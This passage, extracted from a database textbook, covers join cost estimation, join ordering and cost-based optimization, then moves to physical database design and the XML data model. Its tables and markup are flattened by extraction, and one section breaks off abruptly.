will be joined to a single record in the other file.

721

Algorithms for Query Processing and Optimization

CJ2c = bR + (|R| * (xB + 1)) + (( j s * |R| * |S|)/bfrRS)

If a hash key exists for one of the two join attributes—say, B of S—we get

CJ2d = bR + (|R| * h) + (( j s * |R| * |S|)/bfrRS)

where h ≥ 1 is the average number of block accesses to retrieve a record,
given its hash key value. Usually, h is estimated to be 1 for static and linear
hashing and 2 for extendible hashing.

■ J3—Sort-merge join. If the files are already sorted on the join attributes, the
cost function for this method is

CJ3a = bR + bS + (( j s * |R| * |S|)/bfrRS)

If we must sort the files, the cost of sorting must be added. We can use the
formulas from Section 2 to estimate the sorting cost.

Example of Using the Cost Functions. Suppose that we have the EMPLOYEE
file described in the example in the previous section, and assume that the
DEPARTMENT file in Figure A.1 consists of rD = 125 records stored in bD = 13 disk
blocks. Consider the following two join operations:

OP6: EMPLOYEE Dno=Dnumber DEPARTMENT
OP7: DEPARTMENT Mgr_ssn=Ssn EMPLOYEE

Suppose that we have a primary index on Dnumber of DEPARTMENT with xDnumber= 1
level and a secondary index on Mgr_ssn of DEPARTMENT with selection cardinality
sMgr_ssn= 1 and levels xMgr_ssn= 2. Assume that the join selectivity for OP6 is jsOP6 =
(1/|DEPARTMENT|) = 1/125 because Dnumber is a key of DEPARTMENT. Also assume
that the blocking factor for the resulting join file is bfrED= 4 records per block. We
can estimate the worst-case costs for the JOIN operation OP6 using the applicable
methods J1 and J2 as follows:

1. Using method J1 with EMPLOYEE as outer loop:

CJ1 = bE + (bE * bD) + (( jsOP6 * rE * rD)/bfrED)

= 2000 + (2000 * 13) + (((1/125) * 10,000 * 125)/4) = 30,500

2. Using method J1 with DEPARTMENT as outer loop:

CJ1 = bD + (bE * bD) + (( jsOP6 * rE * rD)/bfrED)

= 13 + (13 * 2000) + (((1/125) * 10,000 * 125/4) = 28,513

3. Using method J2 with EMPLOYEE as outer loop:

CJ2c = bE + (rE * (xDnumber+ 1)) + (( jsOP6 * rE * rD)/bfrED
= 2000 + (10,000 * 2) + (((1/125) * 10,000 * 125/4) = 24,500

4. Using method J2 with DEPARTMENT as outer loop:

CJ2a = bD + (rD * (xDno + sDno)) + (( jsOP6 * rE * rD)/bfrED)

= 13 + (125 * (2 + 80)) + (((1/125) * 10,000 * 125/4) = 12,763

Case 4 has the lowest cost estimate and will be chosen. Notice that in case 2 above, if
15 memory buffers (or more) were available for executing the join instead of just 3,
13 of them could be used to hold the entire DEPARTMENT relation (outer loop

722

Algorithms for Query Processing and Optimization

R1 R2

R3

R4

R4 R3

R2

R1

Figure 7
Two left-deep (JOIN) query trees.

relation) in memory, one could be used as buffer for the result, and one would be
used to hold one block at a time of the EMPLOYEE file (inner loop file), and the cost
for case 2 could be drastically reduced to just bE + bD + (( jsOP6 * rE * rD)/bfrED) or
4,513, as discussed in Section 3.2. If some other number of main memory buffers
was available, say nB = 10, then the cost for case 2 would be calculated as follows,
which would also give better performance than case 4:

CJ1 = bD + ( ⎡bD/(nB – 2)⎤ * bE) + ((js * |R| * |S|)/bfrRS)
= 13 + ( ⎡13/8⎤ * 2000) + (((1/125) * 10,000 * 125/4) = 28,513
= 13 + (2 * 2000) + 2500 = 6,513

As an exercise, the reader should perform a similar analysis for OP7.

8.5 Multiple Relation Queries and JOIN Ordering
The algebraic transformation rules in Section 7.2 include a commutative rule and
an associative rule for the join operation. With these rules, many equivalent join
expressions can be produced. As a result, the number of alternative query trees
grows very rapidly as the number of joins in a query increases. A query that joins n
relations will often have n − 1 join operations, and hence can have a large number of
different join orders. Estimating the cost of every possible join tree for a query with
a large number of joins will require a substantial amount of time by the query opti-
mizer. Hence, some pruning of the possible query trees is needed. Query optimizers
typically limit the structure of a (join) query tree to that of left-deep (or right-deep)
trees. A left-deep tree is a binary tree in which the right child of each nonleaf node
is always a base relation. The optimizer would choose the particular left-deep tree
with the lowest estimated cost. Two examples of left-deep trees are shown in Figure
7. (Note that the trees in Figure 5 are also left-deep trees.)

With left-deep trees, the right child is considered to be the inner relation when exe-
cuting a nested-loop join, or the probing relation when executing a single-loop join.
One advantage of left-deep (or right-deep) trees is that they are amenable to
pipelining, as discussed in Section 6. For instance, consider the first left-deep tree in
Figure 7 and assume that the join algorithm is the single-loop method; in this case,
a disk page of tuples of the outer relation is used to probe the inner relation for

723

Algorithms for Query Processing and Optimization

matching tuples. As resulting tuples (records) are produced from the join of R1 and
R2, they can be used to probe R3 to locate their matching records for joining.
Likewise, as resulting tuples are produced from this join, they could be used to
probe R4. Another advantage of left-deep (or right-deep) trees is that having a base
relation as one of the inputs of each join allows the optimizer to utilize any access
paths on that relation that may be useful in executing the join.

If materialization is used instead of pipelining (see Sections 6 and 7.3), the join
results could be materialized and stored as temporary relations. The key idea from
the optimizer’s standpoint with respect to join ordering is to find an ordering that
will reduce the size of the temporary results, since the temporary results (pipelined
or materialized) are used by subsequent operators and hence affect the execution
cost of those operators.

8.6 Example to Illustrate Cost-Based Query Optimization
We will consider query Q2 and its query tree shown in Figure 4(a) to illustrate cost-
based query optimization:

Q2: SELECT Pnumber, Dnum, Lname, Address, Bdate
FROM PROJECT, DEPARTMENT, EMPLOYEE
WHERE Dnum=Dnumber AND Mgr_ssn=Ssn AND

Plocation=‘Stafford’;

Suppose we have the information about the relations shown in Figure 8. The
LOW_VALUE and HIGH_VALUE statistics have been normalized for clarity. The tree
in Figure 4(a) is assumed to represent the result of the algebraic heuristic optimiza-
tion process and the start of cost-based optimization (in this example, we assume
that the heuristic optimizer does not push the projection operations down the tree).

The first cost-based optimization to consider is join ordering. As previously men-
tioned, we assume the optimizer considers only left-deep trees, so the potential join
orders—without CARTESIAN PRODUCT—are:

1. PROJECT DEPARTMENT EMPLOYEE

2. DEPARTMENT PROJECT EMPLOYEE

3. DEPARTMENT EMPLOYEE PROJECT

4. EMPLOYEE DEPARTMENT PROJECT

Assume that the selection operation has already been applied to the PROJECT rela-
tion. If we assume a materialized approach, then a new temporary relation is
created after each join operation. To examine the cost of join order (1), the first
join is between PROJECT and DEPARTMENT. Both the join method and the access
methods for the input relations must be determined. Since DEPARTMENT has no
index according to Figure 8, the only available access method is a table scan (that is,
a linear search). The PROJECT relation will have the selection operation performed
before the join, so two options exist: table scan (linear search) or utilizing
its PROJ_PLOC index, so the optimizer must compare their estimated costs. The

724

Algorithms for Query Processing and Optimization

(a) Table_name

PROJECT
PROJECT

PROJECT

DEPARTMENT

DEPARTMENT
EMPLOYEE

EMPLOYEE

EMPLOYEE

200
2000

50

50

50
10000

50

500

1
1

1

1

1
1

1

1

200
2000

50

50

50
10000

50

500

Dnum

Dnumber

Plocation

Pnumber

Dno

Salary

Mgr_ssn

Ssn

Column_name Num_distinct Low_value High_value

(c) Index_name

*Blevel is the number of levels without the leaf level.

PROJ_PLOC
EMP_SSN

EMP_SAL

1
1

1

4
50

50

200
10000

500NONUNIQUE

NONUNIQUE

UNIQUE

Uniqueness Blevel* Leaf_blocks Distinct_keys

(b) Table_name

PROJECT
DEPARTMENT

EMPLOYEE

100
5

200010000

2000

50

Num_rows Blocks

Figure 8
Sample statistical information for relations in Q2. (a)
Column information. (b) Table information. (c) Index
information.

statistical information on the PROJ_PLOC index (see Figure 8) shows the number
of index levels x = 2 (root plus leaf levels). The index is nonunique (because
Plocation is not a key of PROJECT), so the optimizer assumes a uniform data distri-
bution and estimates the number of record pointers for each Plocation value to be
10. This is computed from the tables in Figure 8 by multiplying Selectivity *
Num_rows, where Selectivity is estimated by 1/Num_distinct. So the cost of using the
index and accessing the records is estimated to be 12 block accesses (2 for the index
and 10 for the data blocks). The cost of a table scan is estimated to be 100 block
accesses, so the index access is more efficient as expected.

In the materialized approach, a temporary file TEMP1 of size 1 block is created to
hold the result of the selection operation. The file size is calculated by determining
the blocking factor using the formula Num_rows/Blocks, which gives 2000/100 or 20
rows per block. Hence, the 10 records selected from the PROJECT relation will fit

725

Algorithms for Query Processing and Optimization

into a single block. Now we can compute the estimated cost of the first join. We will
consider only the nested-loop join method, where the outer relation is the tempo-
rary file, TEMP1, and the inner relation is DEPARTMENT. Since the entire TEMP1 file
fits in the available buffer space, we need to read each of the DEPARTMENT table’s
five blocks only once, so the join cost is six block accesses plus the cost of writing the
temporary result file, TEMP2. The optimizer would have to determine the size of
TEMP2. Since the join attribute Dnumber is the key for DEPARTMENT, any Dnum
value from TEMP1 will join with at most one record from DEPARTMENT, so the
number of rows in TEMP2 will be equal to the number of rows in TEMP1, which is
10. The optimizer would determine the record size for TEMP2 and the number of
blocks needed to store these 10 rows. For brevity, assume that the blocking factor for
TEMP2 is five rows per block, so a total of two blocks are needed to store TEMP2.

Finally, the cost of the last join needs to be estimated. We can use a single-loop join
on TEMP2 since in this case the index EMP_SSN (see Figure 8) can be used to probe
and locate matching records from EMPLOYEE. Hence, the join method would
involve reading in each block of TEMP2 and looking up each of the five Mgr_ssn val-
ues using the EMP_SSN index. Each index lookup would require a root access, a leaf
access, and a data block access (x+1, where the number of levels x is 2). So, 10
lookups require 30 block accesses. Adding the two block accesses for TEMP2 gives a
total of 32 block accesses for this join.

For the final projection, assume pipelining is used to produce the final result, which
does not require additional block accesses, so the total cost for join order (1) is esti-
mated as the sum of the previous costs. The optimizer would then estimate costs in
a similar manner for the other three join orders and choose the one with the lowest
estimate. We leave this as an exercise for the reader.

9 Overview of Query Optimization
in Oracle

The Oracle DBMS22 provides two different approaches to query optimization: rule-
based and cost-based. With the rule-based approach, the optimizer chooses execu-
tion plans based on heuristically ranked operations. Oracle maintains a table of 15
ranked access paths, where a lower ranking implies a more efficient approach. The
access paths range from table access by ROWID (the most efficient)—where ROWID
specifies the record’s physical address that includes the data file, data block, and row
offset within the block—to a full table scan (the least efficient)—where all rows in
the table are searched by doing multiblock reads. However, the rule-based approach
is being phased out in favor of the cost-based approach, where the optimizer exam-
ines alternative access paths and operator algorithms and chooses the execution
plan with the lowest estimated cost. The estimated query cost is proportional to the
expected elapsed time needed to execute the query with the given execution plan.

22The discussion in this section is primarily based on version 7 of Oracle. More optimization techniques
have been added to subsequent versions.

726

Algorithms for Query Processing and Optimization

The Oracle optimizer calculates this cost based on the estimated usage of resources,
such as I/O, CPU time, and memory needed. The goal of cost-based optimization in
Oracle is to minimize the elapsed time to process the entire query.

An interesting addition to the Oracle query optimizer is the capability for an appli-
cation developer to specify hints to the optimizer.23 The idea is that an application
developer might know more information about the data than the optimizer. For
example, consider the EMPLOYEE table shown in Figure A.2. The Sex column of that
table has only two distinct values. If there are 10,000 employees, then the optimizer
would estimate that half are male and half are female, assuming a uniform data dis-
tribution. If a secondary index exists, it would more than likely not be used.
However, if the application developer knows that there are only 100 male employ-
ees, a hint could be specified in an SQL query whose WHERE-clause condition is Sex
= ‘M’ so that the associated index would be used in processing the query. Various
hints can be specified, such as:

■ The optimization approach for an SQL statement

■ The access path for a table accessed by the statement

■ The join order for a join statement

■ A particular join operation in a join statement

The cost-based optimization of Oracle 8 and later versions is a good example of the
sophisticated approach taken to optimize SQL queries in commercial RDBMSs.

10 Semantic Query Optimization
A different approach to query optimization, called semantic query optimization,
has been suggested. This technique, which may be used in combination with the
techniques discussed previously, uses constraints specified on the database
schema—such as unique attributes and other more complex constraints—in order
to modify one query into another query that is more efficient to execute. We will not
discuss this approach in detail but we will illustrate it with a simple example.
Consider the SQL query:

SELECT E.Lname, M.Lname
FROM EMPLOYEE AS E, EMPLOYEE AS M
WHERE E.Super_ssn=M.Ssn AND E.Salary > M.Salary

This query retrieves the names of employees who earn more than their supervisors.
Suppose that we had a constraint on the database schema that stated that no
employee can earn more than his or her direct supervisor. If the semantic query
optimizer checks for the existence of this constraint, it does not need to execute the
query at all because it knows that the result of the query will be empty. This may
save considerable time if the constraint checking can be done efficiently. However,
searching through many constraints to find those that are applicable to a given

23Such hints have also been called query annotations.

727

Algorithms for Query Processing and Optimization

query and that may semantically optimize it can also be quite time-consuming.
With the inclusion of active rules and additional metadata in database systems,
semantic query optimization techniques are being gradually incorporated into the
DBMSs.

11 Summary
In this chapter we gave an overview of the techniques used by DBMSs in processing
and optimizing high-level queries. We first discussed how SQL queries are trans-
lated into relational algebra and then how various relational algebra operations may
be executed by a DBMS. We saw that some operations, particularly SELECT and
JOIN, may have many execution options. We also discussed how operations can be
combined during query processing to create pipelined or stream-based execution
instead of materialized execution.

Following that, we described heuristic approaches to query optimization, which use
heuristic rules and algebraic techniques to improve the efficiency of query execu-
tion. We showed how a query tree that represents a relational algebra expression can
be heuristically optimized by reorganizing the tree nodes and transforming it
into another equivalent query tree that is more efficient to execute. We also gave
equivalence-preserving transformation rules that may be applied to a query tree.
Then we introduced query execution plans for SQL queries, which add method exe-
cution plans to the query tree operations.

We discussed the cost-based approach to query optimization. We showed how cost
functions are developed for some database access algorithms and how these cost
functions are used to estimate the costs of different execution strategies. We pre-
sented an overview of the Oracle query optimizer, and we mentioned the technique
of semantic query optimization.

Review Questions
1. Discuss the reasons for converting SQL queries into relational algebra

queries before optimization is done.

2. Discuss the different algorithms for implementing each of the following
relational operators and the circumstances under which each algorithm can
be used: SELECT, JOIN, PROJECT, UNION, INTERSECT, SET DIFFERENCE,
CARTESIAN PRODUCT.

3. What is a query execution plan?

4. What is meant by the term heuristic optimization? Discuss the main heuris-
tics that are applied during query optimization.

5. How does a query tree represent a relational algebra expression? What is
meant by an execution of a query tree? Discuss the rules for transformation
of query trees and identify when each rule should be applied during opti-
mization.

728

Algorithms for Query Processing and Optimization

6. How many different join orders are there for a query that joins 10 relations?

7. What is meant by cost-based query optimization?

8. What is the difference between pipelining and materialization?

9. Discuss the cost components for a cost function that is used to estimate
query execution cost. Which cost components are used most often as the
basis for cost functions?

10. Discuss the different types of parameters that are used in cost functions.
Where is this information kept?

11. List the cost functions for the SELECT and JOIN methods discussed in
Section 8.

12. What is meant by semantic query optimization? How does it differ from
other query optimization techniques?

Exercises
13. Consider SQL queries Q1, Q8, Q1B, and Q4 in the chapter Basic SQL and

Q27 in the chapter More SQL: Complex Queries, Triggers, Views, and
Schema Modification.

a. Draw at least two query trees that can represent each of these queries.
Under what circumstances would you use each of your query trees?

b. Draw the initial query tree for each of these queries, and then show how
the query tree is optimized by the algorithm outlined in Section 7.

c. For each query, compare your own query trees of part (a) and the initial
and final query trees of part (b).

14. A file of 4096 blocks is to be sorted with an available buffer space of 64
blocks. How many passes will be needed in the merge phase of the external
sort-merge algorithm?

15. Develop cost functions for the PROJECT, UNION, INTERSECTION, SET DIF-
FERENCE, and CARTESIAN PRODUCT algorithms discussed in Section 4.

16. Develop cost functions for an algorithm that consists of two SELECTs, a
JOIN, and a final PROJECT, in terms of the cost functions for the individual
operations.

17. Can a nondense index be used in the implementation of an aggregate opera-
tor? Why or why not?

18. Calculate the cost functions for different options of executing the JOIN oper-
ation OP7 discussed in Section 3.2.

19. Develop formulas for the hybrid hash-join algorithm for calculating the size
of the buffer for the first bucket. Develop more accurate cost estimation for-
mulas for the algorithm.

729

Algorithms for Query Processing and Optimization

20. Estimate the cost of operations OP6 and OP7, using the formulas developed
in Exercise 9.

21. Extend the sort-merge join algorithm to implement the LEFT OUTER JOIN
operation.

22. Compare the cost of two different query plans for the following query:

σSalary > 40000(EMPLOYEE Dno=DnumberDEPARTMENT)

Use the database statistics in Figure 8.

Selected Bibliography
A detailed algorithm for relational algebra optimization is given by Smith and
Chang (1975). The Ph.D. thesis of Kooi (1980) provides a foundation for query pro-
cessing techniques. A survey paper by Jarke and Koch (1984) gives a taxonomy of
query optimization and includes a bibliography of work in this area. A survey by
Graefe (1993) discusses query execution in database systems and includes an exten-
sive bibliography.

Whang (1985) discusses query optimization in OBE (Office-By-Example), which is
a system based on the language QBE. Cost-based optimization was introduced in
the SYSTEM R experimental DBMS and is discussed in Astrahan et al. (1976).
Selinger et al. (1979) is a classic paper that discussed cost-based optimization of
multiway joins in SYSTEM R. Join algorithms are discussed in Gotlieb (1975),
Blasgen and Eswaran (1976), and Whang et al. (1982). Hashing algorithms for
implementing joins are described and analyzed in DeWitt et al. (1984),
Bratbergsengen (1984), Shapiro (1986), Kitsuregawa et al. (1989), and Blakeley and
Martin (1990), among others. Approaches to finding a good join order are pre-
sented in Ioannidis and Kang (1990) and in Swami and Gupta (1989). A discussion
of the implications of left-deep and bushy join trees is presented in Ioannidis and
Kang (1991). Kim (1982) discusses transformations of nested SQL queries into
canonical representations. Optimization of aggregate functions is discussed in Klug
(1982) and Muralikrishna (1992). Salzberg et al. (1990) describe a fast external sort-
ing algorithm. Estimating the size of temporary relations is crucial for query opti-
mization. Sampling-based estimation schemes are presented in Haas et al. (1995)
and in Haas and Swami (1995). Lipton et al. (1990) also discuss selectivity estima-
tion. Having the database system store and use more detailed statistics in the form
of histograms is the topic of Muralikrishna and DeWitt (1988) and Poosala et al.
(1996).

Kim et al. (1985) discuss advanced topics in query optimization. Semantic query
optimization is discussed in King (1981) and Malley and Zdonick (1986). Work on
semantic query optimization is reported in Chakravarthy et al. (1990), Shenoy and
Ozsoyoglu (1989), and Siegel et al. (1992).

730

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure A.1
Schema diagram for the
COMPANY relational
database schema.

731

Algorithms for Query Processing and Optimization

DEPT_LOCATIONS

Dnumber

Houston

Stafford

Bellaire

Sugarland

Dlocation

DEPARTMENT

Dname

Research

Administration

Headquarters 1

5

4

888665555

333445555

987654321

1981-06-19

1988-05-22

1995-01-01

Dnumber Mgr_ssn Mgr_start_date

WORKS_ON

Essn

123456789

123456789

666884444

453453453

453453453

333445555

333445555

333445555

333445555

999887777

999887777

987987987

987987987

987654321

987654321

888665555

3

1

2

2

1

2

30

30

30

10

10

3

10

20

20

20

40.0

32.5

7.5

10.0

10.0

10.0

10.0

20.0

20.0

30.0

5.0

10.0

35.0

20.0

15.0

NULL

Pno Hours

PROJECT

Pname

ProductX

ProductY

ProductZ

Computerization

Reorganization

Newbenefits

3

1

2

30

10

20

5

5

5

4

4

1

Houston

Bellaire

Sugarland

Stafford

Stafford

Houston

Pnumber Plocation Dnum

DEPENDENT

333445555

333445555

333445555

987654321

123456789

123456789

123456789

Joy

Alice F

M

F

M

M

F

F

1986-04-05

1983-10-25

1958-05-03

1942-02-28

1988-01-04

1988-12-30

1967-05-05

Theodore

Alice

Elizabeth

Abner

Michael

Spouse

Daughter

Son

Daughter

Spouse

Spouse

Son

Dependent_name Sex Bdate Relationship

EMPLOYEE

Fname

John

Franklin

Jennifer

Alicia

Ramesh

Joyce

James

Ahmad

Narayan

English

Borg

Jabbar

666884444

453453453

888665555

987987987

F

F

M

M

M

M

M

F

4

4

5

5

4

1

5

5

25000

43000

30000

40000

25000

55000

38000

25000

987654321

888665555

333445555

888665555

987654321

NULL

333445555

333445555

Zelaya

Wallace

Smith

Wong

3321 Castle, Spring, TX

291 Berry, Bellaire, TX

731 Fondren, Houston, TX

638 Voss, Houston, TX

1968-01-19

1941-06-20

1965-01-09

1955-12-08

1969-03-29

1937-11-10

1962-09-15

1972-07-31

980 Dallas, Houston, TX

450 Stone, Houston, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

999887777

987654321

123456789

333445555

Minit Lname Ssn Bdate Address Sex DnoSalary Super_ssn

B

T

J

S

K

A

V

E

Houston

1

4

5

5

Essn

5

Figure A.2
One possible database state for the COMPANY relational database schema.

732

Physical Database
Design and Tuning

Various techniques by which queries can beprocessed efficiently by the DBMS are mostly
internal to the DBMS and invisible to the programmer. In this chapter we discuss
additional issues that affect the performance of an application running on a DBMS.
In particular, we discuss some of the options available to database administrators
and programmers for storing databases, and some of the heuristics, rules, and tech-
niques that they can use to tune the database for performance improvement. First,
in Section 1, we discuss the issues that arise in physical database design dealing with
storage and access of data. Then, in Section 2, we discuss how to improve database
performance through tuning, indexing of data, database design, and the queries
themselves.

1 Physical Database Design
in Relational Databases

In this section, we begin by discussing the physical design factors that affect the per-
formance of applications and transactions, and then we comment on the specific
guidelines for RDBMSs.

1.1 Factors That Influence Physical Database Design
Physical design is an activity where the goal is not only to create the appropriate
structuring of data in storage, but also to do so in a way that guarantees good per-
formance. For a given conceptual schema, there are many physical design alterna-
tives in a given DBMS. It is not possible to make meaningful physical design

From Chapter 20 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

733

Physical Database Design and Tuning

decisions and performance analyses until the database designer knows the mix of
queries, transactions, and applications that are expected to run on the database.
This is called the job mix for the particular set of database system applications. The
database administrators/designers must analyze these applications, their expected
frequencies of invocation, any timing constraints on their execution speed, the
expected frequency of update operations, and any unique constraints on attributes.
We discuss each of these factors next.

A. Analyzing the Database Queries and Transactions. Before undertaking
the physical database design, we must have a good idea of the intended use of the
database by defining in a high-level form the queries and transactions that are
expected to run on the database. For each retrieval query, the following informa-
tion about the query would be needed:

1. The files that will be accessed by the query.1

2. The attributes on which any selection conditions for the query are specified.

3. Whether the selection condition is an equality, inequality, or a range condi-
tion.

4. The attributes on which any join conditions or conditions to link multiple
tables or objects for the query are specified.

5. The attributes whose values will be retrieved by the query.

The attributes listed in items 2 and 4 above are candidates for the definition of
access structures, such as indexes, hash keys, or sorting of the file.

For each update operation or update transaction, the following information
would be needed:

1. The files that will be updated.

2. The type of operation on each file (insert, update, or delete).

3. The attributes on which selection conditions for a delete or update are spec-
ified.

4. The attributes whose values will be changed by an update operation.

Again, the attributes listed in item 3 are candidates for access structures on the files,
because they would be used to locate the records that will be updated or deleted. On
the other hand, the attributes listed in item 4 are candidates for avoiding an access
structure, since modifying them will require updating the access structures.

B. Analyzing the Expected Frequency of Invocation of Queries and
Transactions. Besides identifying the characteristics of expected retrieval queries
and update transactions, we must consider their expected rates of invocation. This
frequency information, along with the attribute information collected on each
query and transaction, is used to compile a cumulative list of the expected fre-
quency of use for all queries and transactions. This is expressed as the expected fre-
quency of using each attribute in each file as a selection attribute or a join attribute,

1For simplicity we use the term files here, but this can also mean tables or relations.

734

Physical Database Design and Tuning

over all the queries and transactions. Generally, for large volumes of processing, the
informal 80–20 rule can be used: approximately 80 percent of the processing is
accounted for by only 20 percent of the queries and transactions. Therefore, in prac-
tical situations, it is rarely necessary to collect exhaustive statistics and invocation
rates on all the queries and transactions; it is sufficient to determine the 20 percent
or so most important ones.

C. Analyzing the Time Constraints of Queries and Transactions. Some
queries and transactions may have stringent performance constraints. For example,
a transaction may have the constraint that it should terminate within 5 seconds on
95 percent of the occasions when it is invoked, and that it should never take more
than 20 seconds. Such timing constraints place further priorities on the attributes
that are candidates for access paths. The selection attributes used by queries and
transactions with time constraints become higher-priority candidates for primary
access structures for the files, because the primary access structures are generally the
most efficient for locating records in a file.

D. Analyzing the Expected Frequencies of Update Operations. A minimum
number of access paths should be specified for a file that is frequently updated,
because updating the access paths themselves slows down the update operations. For
example, if a file that has frequent record insertions has 10 indexes on 10 different
attributes, each of these indexes must be updated whenever a new record is inserted.
The overhead for updating 10 indexes can slow down the insert operations.

E. Analyzing the Uniqueness Constraints on Attributes. Access paths should
be specified on all candidate key attributes—or sets of attributes—that are either the
primary key of a file or unique attributes. The existence of an index (or other access
path) makes it sufficient to only search the index when checking this uniqueness
constraint, since all values of the attribute will exist in the leaf nodes of the index.
For example, when inserting a new record, if a key attribute value of the new record
already exists in the index, the insertion of the new record should be rejected, since it
would violate the uniqueness constraint on the attribute.

Once the preceding information is compiled, it is possible to address the physical
database design decisions, which consist mainly of deciding on the storage struc-
tures and access paths for the database files.

1.2 Physical Database Design Decisions
Most relational systems represent each base relation as a physical database file. The
access path options include specifying the type of primary file organization for each
relation and the attributes of which indexes that should be defined. At most, one of
the indexes on each file may be a primary or a clustering index. Any number of
additional secondary indexes can be created.2

2The reader should review the various types of indexes and be familiar with the algorithms for query
processing.

735

Physical Database Design and Tuning

Design Decisions about Indexing. The attributes whose values are required in
equality or range conditions (selection operation) are those that are keys or that
participate in join conditions (join operation) requiring access paths, such as
indexes.

The performance of queries largely depends upon what indexes or hashing schemes
exist to expedite the processing of selections and joins. On the other hand, during
insert, delete, or update operations, the existence of indexes adds to the overhead.
This overhead must be justified in terms of the gain in efficiency by expediting
queries and transactions.

The physical design decisions for indexing fall into the following categories:

1. Whether to index an attribute. The general rules for creating an index on an
attribute are that the attribute must either be a key (unique), or there must
be some query that uses that attribute either in a selection condition (equal-
ity or range of values) or in a join condition. One reason for creating multi-
ple indexes is that some operations can be processed by just scanning the
indexes, without having to access the actual data file.

2. What attribute or attributes to index on. An index can be constructed on a
single attribute, or on more than one attribute if it is a composite index. If
multiple attributes from one relation are involved together in several queries,
(for example, (Garment_style_#, Color) in a garment inventory database), a
multiattribute (composite) index is warranted. The ordering of attributes
within a multiattribute index must correspond to the queries. For instance,
the above index assumes that queries would be based on an ordering of col-
ors within a Garment_style_# rather than vice versa.

3. Whether to set up a clustered index. At most, one index per table can be a
primary or clustering index, because this implies that the file be physically
ordered on that attribute. In most RDBMSs, this is specified by the keyword
CLUSTER. (If the attribute is a key, a primary index is created, whereas a
clustering index is created if the attribute is not a key.) If a table requires sev-
eral indexes, the decision about which one should be the primary or cluster-
ing index depends upon whether keeping the table ordered on that attribute
is needed. Range queries benefit a great deal from clustering. If several
attributes require range queries, relative benefits must be evaluated before
deciding which attribute to cluster on. If a query is to be answered by doing
an index search only (without retrieving data records), the corresponding
index should not be clustered, since the main benefit of clustering is achieved
when retrieving the records themselves. A clustering index may be set up as a
multiattribute index if range retrieval by that composite key is useful in
report creation (for example, an index on Zip_code, Store_id, and Product_id
may be a clustering index for sales data).

4. Whether to use a hash index over a tree index. In general, RDBMSs use B+-
trees for indexing. However, ISAM and hash indexes are also provided in
some systems. B+-trees support both equality and range queries on the
attribute used as the search key. Hash indexes work well with equality

736

Physical Database Design and Tuning

conditions, particularly during joins to find a matching record(s), but they
do not support range queries.

5. Whether to use dynamic hashing for the file. For files that are very
volatile—that is, those that grow and shrink continuously—one of the
dynamic hashing schemes would be suitable. Currently, they are not offered
by many commercial RDBMSs.

How to Create an Index. Many RDBMSs have a similar type of command for
creating an index, although it is not part of the SQL standard. The general form of
this command is:

CREATE [ UNIQUE ] INDEX
ON

and start tags have one and two
attributes, respectively.

HTML has a very large number of predefined tags, and whole books are devoted to
describing how to use these tags. If designed properly, HTML documents can be

1That is why it is known as HyperText Markup Language.
2

stands for table data.
3This is how the term attribute is used in document markup languages, which differs from how it is used
in database models.

424

XML: Extensible Markup Language

formatted so that humans are able to easily understand the document contents, and
are able to navigate through the resulting Web documents. However, the source
HTML text documents are very difficult to interpret automatically by computer pro-
grams because they do not include schema information about the type of data in the
documents. As e-commerce and other Internet applications become increasingly
automated, it is becoming crucial to be able to exchange Web documents among
various computer sites and to interpret their contents automatically. This need was
one of the reasons that led to the development of XML. In addition, an extendible
version of HTML called XHTML was developed that allows users to extend the tags
of HTML for different applications, and allows an XHTML file to be interpreted by
standard XML processing programs. Our discussion will focus on XML only.

The example in Figure 2 illustrates a static HTML page, since all the information to
be displayed is explicitly spelled out as fixed text in the HTML file. In many cases,
some of the information to be displayed may be extracted from a database. For
example, the project names and the employees working on each project may be
extracted from the database in Figure A.1 through the appropriate SQL query. We
may want to use the same HTML formatting tags for displaying each project and the
employees who work on it, but we may want to change the particular projects (and
employees) being displayed. For example, we may want to see a Web page displaying
the information for ProjectX, and then later a page displaying the information for
ProjectY. Although both pages are displayed using the same HTML formatting tags,
the actual data items displayed will be different. Such Web pages are called dynamic,
since the data parts of the page may be different each time it is displayed, even
though the display appearance is the same.

2 XML Hierarchical (Tree) Data Model
We now introduce the data model used in XML. The basic object in XML is the
XML document. Two main structuring concepts are used to construct an XML doc-
ument: elements and attributes. It is important to note that the term attribute in
XML is not used in the same manner as is customary in database terminology, but
rather as it is used in document description languages such as HTML and SGML.4

Attributes in XML provide additional information that describes elements, as we
will see. There are additional concepts in XML, such as entities, identifiers, and ref-
erences, but first we concentrate on describing elements and attributes to show the
essence of the XML model.

Figure 3 shows an example of an XML element called . As in HTML, ele-
ments are identified in a document by their start tag and end tag. The tag names are
enclosed between angled brackets < ... >, and end tags are further identified by a
slash, .5

4SGML (Standard Generalized Markup Language) is a more general language for describing documents
and provides capabilities for specifying new tags. However, it is more complex than HTML and XML.
5The left and right angled bracket characters (< and >) are reserved characters, as are the ampersand
(&), apostrophe (’), and single quotation mark (‘). To include them within the text of a document, they must
be encoded with escapes as <, >, &, ', and ", respectively.

425

XML: Extensible Markup Language

Figure 3
A complex XML
element called
.



ProductX
1
Bellaire
5

123456789
Smith
32.5


453453453
Joyce
20.0



ProductY
2
Sugarland
5

123456789
7.5


453453453
20.0


333445555
10.0



Complex elements are constructed from other elements hierarchically, whereas
simple elements contain data values. A major difference between XML and HTML
is that XML tag names are defined to describe the meaning of the data elements in
the document, rather than to describe how the text is to be displayed. This makes it
possible to process the data elements in the XML document automatically by com-
puter programs. Also, the XML tag (element) names can be defined in another doc-
ument, known as the schema document, to give a semantic meaning to the tag names

426

XML: Extensible Markup Language

that can be exchanged among multiple users. In HTML, all tag names are prede-
fined and fixed; that is why they are not extendible.

It is straightforward to see the correspondence between the XML textual representa-
tion shown in Figure 3 and the tree structure shown in Figure 1. In the tree repre-
sentation, internal nodes represent complex elements, whereas leaf nodes represent
simple elements. That is why the XML model is called a tree model or a
hierarchical model. In Figure 3, the simple elements are the ones with the tag
names , , , , , ,
, and . The complex elements are the ones with the tag names
, , and . In general, there is no limit on the levels of
nesting of elements.

It is possible to characterize three main types of XML documents:

